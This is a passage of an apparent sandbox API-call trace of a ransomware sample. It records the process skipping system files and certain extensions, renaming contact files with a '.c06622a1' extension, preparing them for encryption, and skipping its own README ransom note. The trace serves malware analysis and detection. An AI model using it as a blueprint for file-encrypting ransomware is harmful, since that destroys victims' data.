_Str2="contact") returned 10 [0155.546] wcslen (_String="msp") returned 0x3 [0155.546] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0155.546] wcslen (_String="msstyles") returned 0x8 [0155.546] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0155.546] wcslen (_String="msu") returned 0x3 [0155.546] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0155.546] wcslen (_String="nls") returned 0x3 [0155.546] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0155.546] wcslen (_String="nomedia") returned 0x7 [0155.546] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0155.547] wcslen (_String="ocx") returned 0x3 [0155.547] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0155.547] wcslen (_String="prf") returned 0x3 [0155.547] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0155.547] wcslen (_String="ps1") returned 0x3 [0155.547] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0155.547] wcslen (_String="rom") returned 0x3 [0155.547] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0155.547] wcslen (_String="rtp") returned 0x3 [0155.547] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0155.547] wcslen (_String="scr") returned 0x3 [0155.547] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0155.547] wcslen (_String="shs") returned 0x3 [0155.547] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0155.547] wcslen (_String="spl") returned 0x3 [0155.547] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0155.547] wcslen (_String="sys") returned 0x3 [0155.547] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0155.547] wcslen (_String="theme") returned 0x5 [0155.547] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0155.547] wcslen (_String="themepack") returned 0x9 [0155.547] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0155.547] wcslen (_String="wpx") returned 0x3 [0155.547] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0155.547] wcslen (_String="lock") returned 0x4 [0155.547] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0155.547] wcslen (_String="key") returned 0x3 [0155.547] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0155.548] wcslen (_String="hta") returned 0x3 [0155.548] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0155.548] wcslen (_String="msi") returned 0x3 [0155.548] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0155.548] wcslen (_String="pdb") returned 0x3 [0155.548] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0155.548] wcslen (_String="sqlite") returned 0x6 [0155.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0155.548] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0155.548] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0155.548] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0155.548] wcscpy (in: _Dest=0x321009e, _Source="chucu jadnvk.contact" | out: _Dest="chucu jadnvk.contact") returned="chucu jadnvk.contact" [0155.548] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", dwFileAttributes=0x80) returned 1 [0155.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.549] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.549] ReadFile (in: hFile=0x1a8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.557] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x856ae0af [0155.557] RtlComputeCrc32 (PartialCrc=0xe0af, Buffer=0x32ec24, Length=0x80) returned 0x7132f7ca [0155.557] RtlComputeCrc32 (PartialCrc=0xf7ca, Buffer=0x32ec24, Length=0x80) returned 0x9922324d [0155.557] RtlComputeCrc32 (PartialCrc=0x324d, Buffer=0x32ec24, Length=0x80) returned 0xc8b7386e [0155.557] RtlComputeCrc32 (PartialCrc=0x386e, Buffer=0x32ec24, Length=0x80) returned 0xd685909 [0155.557] CloseHandle (hObject=0x1a8) returned 1 [0155.557] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0155.557] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0155.558] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 0x3f [0155.558] wcscpy (in: _Dest=0x32200ce, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.558] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.c06622a1"), dwFlags=0x8) returned 1 [0155.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0155.574] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.574] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0155.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3fc [0155.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1767d24c [0155.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5856636c [0155.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c7ceab6 [0155.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b53d6b7 [0155.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x381c476e [0155.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x752e45ff [0155.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3396b4f1 [0155.587] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xa66ed062 [0155.587] RtlComputeCrc32 (PartialCrc=0xd062, Buffer=0x2690094, Length=0x80) returned 0xa462be53 [0155.587] RtlComputeCrc32 (PartialCrc=0xbe53, Buffer=0x2690094, Length=0x80) returned 0x503b1ab6 [0155.587] RtlComputeCrc32 (PartialCrc=0x1ab6, Buffer=0x2690094, Length=0x80) returned 0xe80b20ed [0155.587] RtlComputeCrc32 (PartialCrc=0x20ed, Buffer=0x2690094, Length=0x80) returned 0x9f00e0df [0155.598] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0155.598] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0155.598] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0155.598] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.598] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0155.598] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0155.598] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0155.598] wcslen (_String="autorun.inf") returned 0xb [0155.598] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0155.598] wcslen (_String="boot.ini") returned 0x8 [0155.598] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0155.599] wcslen (_String="bootfont.bin") returned 0xc [0155.599] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0155.599] wcslen (_String="bootsect.bak") returned 0xc [0155.599] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0155.599] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0155.599] _wcsicmp (_Str1="lulcit amkdfe.contact", _Str2="README.c06622a1.TXT") returned -6 [0155.599] wcsstr (_Str="lulcit amkdfe.contact", _SubStr="README") returned 0x0 [0155.599] _wcsicmp (_Str1="autorun.inf", _Str2="lulcit amkdfe.contact") returned -11 [0155.599] wcslen (_String="autorun.inf") returned 0xb [0155.599] _wcsicmp (_Str1="boot.ini", _Str2="lulcit amkdfe.contact") returned -10 [0155.599] wcslen (_String="boot.ini") returned 0x8 [0155.599] _wcsicmp (_Str1="bootfont.bin", _Str2="lulcit amkdfe.contact") returned -10 [0155.599] wcslen (_String="bootfont.bin") returned 0xc [0155.599] _wcsicmp (_Str1="bootsect.bak", _Str2="lulcit amkdfe.contact") returned -10 [0155.599] wcslen (_String="bootsect.bak") returned 0xc [0155.599] _wcsicmp (_Str1="desktop.ini", _Str2="lulcit amkdfe.contact") returned -8 [0155.599] wcslen (_String="desktop.ini") returned 0xb [0155.599] _wcsicmp (_Str1="iconcache.db", _Str2="lulcit amkdfe.contact") returned -3 [0155.599] wcslen (_String="iconcache.db") returned 0xc [0155.599] _wcsicmp (_Str1="ntldr", _Str2="lulcit amkdfe.contact") returned 2 [0155.599] wcslen (_String="ntldr") returned 0x5 [0155.599] _wcsicmp (_Str1="ntuser.dat", _Str2="lulcit amkdfe.contact") returned 2 [0155.599] wcslen (_String="ntuser.dat") returned 0xa [0155.599] _wcsicmp (_Str1="ntuser.dat.log", _Str2="lulcit amkdfe.contact") returned 2 [0155.599] wcslen (_String="ntuser.dat.log") returned 0xe [0155.599] _wcsicmp (_Str1="ntuser.ini", _Str2="lulcit amkdfe.contact") returned 2 [0155.599] wcslen (_String="ntuser.ini") returned 0xa [0155.599] _wcsicmp (_Str1="thumbs.db", _Str2="lulcit amkdfe.contact") returned 8 [0155.599] wcslen (_String="thumbs.db") returned 0x9 [0155.600] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0155.600] wcslen (_String="386") returned 0x3 [0155.600] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0155.600] wcslen (_String="adv") returned 0x3 [0155.600] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0155.600] wcslen (_String="ani") returned 0x3 [0155.600] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0155.600] wcslen (_String="bat") returned 0x3 [0155.600] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0155.600] wcslen (_String="bin") returned 0x3 [0155.600] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0155.600] wcslen (_String="cab") returned 0x3 [0155.600] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0155.600] wcslen (_String="cmd") returned 0x3 [0155.600] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0155.600] wcslen (_String="com") returned 0x3 [0155.600] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0155.600] wcslen (_String="cpl") returned 0x3 [0155.600] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0155.600] wcslen (_String="cur") returned 0x3 [0155.600] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0155.600] wcslen (_String="deskthemepack") returned 0xd [0155.600] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0155.600] wcslen (_String="diagcab") returned 0x7 [0155.600] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0155.600] wcslen (_String="diagcfg") returned 0x7 [0155.600] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0155.600] wcslen (_String="diagpkg") returned 0x7 [0155.601] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0155.601] wcslen (_String="dll") returned 0x3 [0155.601] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0155.601] wcslen (_String="drv") returned 0x3 [0155.601] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0155.601] wcslen (_String="exe") returned 0x3 [0155.601] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0155.601] wcslen (_String="hlp") returned 0x3 [0155.601] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0155.601] wcslen (_String="icl") returned 0x3 [0155.601] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0155.601] wcslen (_String="icns") returned 0x4 [0155.601] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0155.601] wcslen (_String="ico") returned 0x3 [0155.601] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0155.601] wcslen (_String="ics") returned 0x3 [0155.601] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0155.601] wcslen (_String="idx") returned 0x3 [0155.601] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0155.601] wcslen (_String="ldf") returned 0x3 [0155.601] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0155.601] wcslen (_String="lnk") returned 0x3 [0155.601] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0155.601] wcslen (_String="mod") returned 0x3 [0155.601] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0155.601] wcslen (_String="mpa") returned 0x3 [0155.601] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0155.601] wcslen (_String="msc") returned 0x3 [0155.602] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0155.602] wcslen (_String="msp") returned 0x3 [0155.602] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0155.602] wcslen (_String="msstyles") returned 0x8 [0155.602] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0155.602] wcslen (_String="msu") returned 0x3 [0155.602] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0155.602] wcslen (_String="nls") returned 0x3 [0155.602] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0155.602] wcslen (_String="nomedia") returned 0x7 [0155.602] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0155.602] wcslen (_String="ocx") returned 0x3 [0155.602] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0155.602] wcslen (_String="prf") returned 0x3 [0155.602] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0155.602] wcslen (_String="ps1") returned 0x3 [0155.602] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0155.602] wcslen (_String="rom") returned 0x3 [0155.602] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0155.602] wcslen (_String="rtp") returned 0x3 [0155.602] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0155.602] wcslen (_String="scr") returned 0x3 [0155.602] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0155.602] wcslen (_String="shs") returned 0x3 [0155.602] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0155.602] wcslen (_String="spl") returned 0x3 [0155.602] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0155.602] wcslen (_String="sys") returned 0x3 [0155.602] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0155.603] wcslen (_String="theme") returned 0x5 [0155.603] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0155.603] wcslen (_String="themepack") returned 0x9 [0155.603] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0155.603] wcslen (_String="wpx") returned 0x3 [0155.603] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0155.603] wcslen (_String="lock") returned 0x4 [0155.603] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0155.603] wcslen (_String="key") returned 0x3 [0155.603] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0155.603] wcslen (_String="hta") returned 0x3 [0155.603] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0155.603] wcslen (_String="msi") returned 0x3 [0155.603] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0155.603] wcslen (_String="pdb") returned 0x3 [0155.603] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0155.603] wcslen (_String="sqlite") returned 0x6 [0155.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0155.603] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0155.603] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0155.603] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0155.604] wcscpy (in: _Dest=0x321009e, _Source="lulcit amkdfe.contact" | out: _Dest="lulcit amkdfe.contact") returned="lulcit amkdfe.contact" [0155.604] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", dwFileAttributes=0x80) returned 1 [0155.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0155.604] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.604] ReadFile (in: hFile=0x1b8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.606] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x91bf577b [0155.606] RtlComputeCrc32 (PartialCrc=0x577b, Buffer=0x32ec24, Length=0x80) returned 0xea8cae5 [0155.606] RtlComputeCrc32 (PartialCrc=0xcae5, Buffer=0x32ec24, Length=0x80) returned 0xee4b9d8a [0155.606] RtlComputeCrc32 (PartialCrc=0x9d8a, Buffer=0x32ec24, Length=0x80) returned 0x2c0f61d9 [0155.606] RtlComputeCrc32 (PartialCrc=0x61d9, Buffer=0x32ec24, Length=0x80) returned 0x1b1a0963 [0155.606] CloseHandle (hObject=0x1b8) returned 1 [0155.606] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0155.607] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0155.607] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 0x40 [0155.607] wcscpy (in: _Dest=0x32200d0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.607] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.c06622a1"), dwFlags=0x8) returned 1 [0155.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0155.611] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.611] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0155.620] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e191366 [0155.620] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x13ed1fd0 [0155.620] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1953c321 [0155.620] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x880ea08 [0155.620] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d0e2600 [0155.620] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4db7315d [0155.620] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x782bdcc4 [0155.620] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x430e1e7a [0155.624] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x235f083d [0155.624] RtlComputeCrc32 (PartialCrc=0x83d, Buffer=0x2b70094, Length=0x80) returned 0x65f316f5 [0155.624] RtlComputeCrc32 (PartialCrc=0x16f5, Buffer=0x2b70094, Length=0x80) returned 0xfaae6b18 [0155.624] RtlComputeCrc32 (PartialCrc=0x6b18, Buffer=0x2b70094, Length=0x80) returned 0x594764d7 [0155.624] RtlComputeCrc32 (PartialCrc=0x64d7, Buffer=0x2b70094, Length=0x80) returned 0x7f018f2e [0155.624] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0155.624] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0155.624] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0155.624] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a5b88c0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8a5b88c0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8a5b88c0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0155.625] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0155.625] FindNextFileW (in: hFindFile=0x132728, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0155.625] _wcsicmp (_Str1="sikvnb huvuib.contact", _Str2="README.c06622a1.TXT") returned 1 [0155.625] wcsstr (_Str="sikvnb huvuib.contact", _SubStr="README") returned 0x0 [0155.625] _wcsicmp (_Str1="autorun.inf", _Str2="sikvnb huvuib.contact") returned -18 [0155.625] wcslen (_String="autorun.inf") returned 0xb [0155.625] _wcsicmp (_Str1="boot.ini", _Str2="sikvnb huvuib.contact") returned -17 [0155.625] wcslen (_String="boot.ini") returned 0x8 [0155.625] _wcsicmp (_Str1="bootfont.bin", _Str2="sikvnb huvuib.contact") returned -17 [0155.625] wcslen (_String="bootfont.bin") returned 0xc [0155.625] _wcsicmp (_Str1="bootsect.bak", _Str2="sikvnb huvuib.contact") returned -17 [0155.625] wcslen (_String="bootsect.bak") returned 0xc [0155.625] _wcsicmp (_Str1="desktop.ini", _Str2="sikvnb huvuib.contact") returned -15 [0155.625] wcslen (_String="desktop.ini") returned 0xb [0155.625] _wcsicmp (_Str1="iconcache.db", _Str2="sikvnb huvuib.contact") returned -10 [0155.625] wcslen (_String="iconcache.db") returned 0xc [0155.625] _wcsicmp (_Str1="ntldr", _Str2="sikvnb huvuib.contact") returned -5 [0155.625] wcslen (_String="ntldr") returned 0x5 [0155.625] _wcsicmp (_Str1="ntuser.dat", _Str2="sikvnb huvuib.contact") returned -5 [0155.625] wcslen (_String="ntuser.dat") returned 0xa [0155.625] _wcsicmp (_Str1="ntuser.dat.log", _Str2="sikvnb huvuib.contact") returned -5 [0155.625] wcslen (_String="ntuser.dat.log") returned 0xe [0155.625] _wcsicmp (_Str1="ntuser.ini", _Str2="sikvnb huvuib.contact") returned -5 [0155.625] wcslen (_String="ntuser.ini") returned 0xa [0155.625] _wcsicmp (_Str1="thumbs.db", _Str2="sikvnb huvuib.contact") returned 1 [0155.625] wcslen (_String="thumbs.db") returned 0x9 [0155.625] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0155.625] wcslen (_String="386") returned 0x3 [0155.625] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0155.626] wcslen (_String="adv") returned 0x3 [0155.626] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0155.626] wcslen (_String="ani") returned 0x3 [0155.626] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0155.626] wcslen (_String="bat") returned 0x3 [0155.626] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0155.626] wcslen (_String="bin") returned 0x3 [0155.626] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0155.626] wcslen 